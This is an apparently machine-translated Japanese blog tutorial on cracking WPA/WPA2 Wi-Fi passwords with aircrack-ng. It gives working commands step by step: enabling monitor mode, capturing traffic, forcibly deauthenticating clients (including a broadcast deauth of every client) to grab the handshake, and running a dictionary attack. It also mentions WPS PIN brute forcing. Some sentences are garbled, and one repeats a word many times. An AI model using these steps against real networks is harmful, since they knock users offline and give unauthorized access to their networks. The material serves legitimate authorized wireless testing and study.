あなたがWPA/WPA2ネットワーク(WPSなし)をpentestすることを計画している場合、私はあなたのために二つの言葉を持っています。 運がいい
侵入テストのすべての実験で、私はWPA/WPA2ハンドシェイクに対する辞書攻撃が最も迷惑で無駄な練習であることを発見しました。 これは、:
- 何百万もの単語を含む辞書ファイル内の各単語を調べるのは時間がかかります。
- 成功は保証されていません(パスフレーズが辞書に存在しない可能性があります)。
インドでの私の実験では、WiFiパスフレーズは通常、ヒンディー語と英語の単語またはヒンドゥー教の名前の組み合わせです。
まだWPAハンドシェイクに対する辞書攻撃を試みるのに十分な勇気があるなら、ここに手順があります。
更新:私はまた、私のYouTubeチャンネルにWPA hanshakeをキャプチャし、クラックする方法についてのビデオを掲載しています。
WPAハンドシェイクで辞書攻撃を開始する方法
あなたは幸運になるかもしれませんし、あなたの最も近いWiFiパスワードは、一般的な辞書の単語や数 このような場合、辞書攻撃で成功する可能性があります。
ステップ1:ワイヤレスインターフェイスでモニタモードを有効にする
airmon-ng start wlan0
これにより、モニタモードが開始されます。
ステップ2:最寄りのWiFiネットワークに注意してください。
airodump-ng mon0
ステップ3:ターゲットネットワークのチャネルをメモし、そのチャネルからパケットをダンプし、ローカルキャプチャファイルに保存します。
airodump-ng -c6 mon0 -w capture_file
ステップ4: WAIT for WPA handshake capture
この時点で、’aireplay-ng’を使用して、ネットワークから関連する正当なクライアントの認証を解除できます。 ポイントは、彼/彼女はすぐに再び認証されるように、我々はあまりにも長い間待たずに握手をキャプチャするということです:
aireplay-ng --deauth 0 -a <AP\_MAC> -c <CLIENT\_MAC> mon0
関連するクライアントのMACがわからない場合は、単にすべてのクライアントに”deauth”を”ブロードキャスト”します:
aireplay-ng --deauth 0 -a <AP\_MAC> mon0
ステップ5:WPAハンドシェイクを取得した後、辞書を使用して強制的に強制的に強制的に強制的に強制的に強制的に強制的に強制的に強制的に強制 これには’aircrack-ng’を使用します:
aircrack-ng capture\_file-01.cap -w /media/Pranshu/...../dic/dark0de.lst
今、あなたの祈りを言うと、パスフレーズは、あなたが選んだ辞書に存在していることを願っています。
また、このwebサイトでオンライン分散WPA/WPA2ハンドシェイククラッキングツールを使用することもできます。
アクセスポイントがWPSを有効にしている場合、実装上の欠陥のためにWPSピンをブルートフォースするために必要な組み合わせは11,000個しかないため、WPA/WPA2パスフレーズのリカバリが容易になることに注意してください。
免責事項:これは実験または許可された侵入テストのみを目的としています。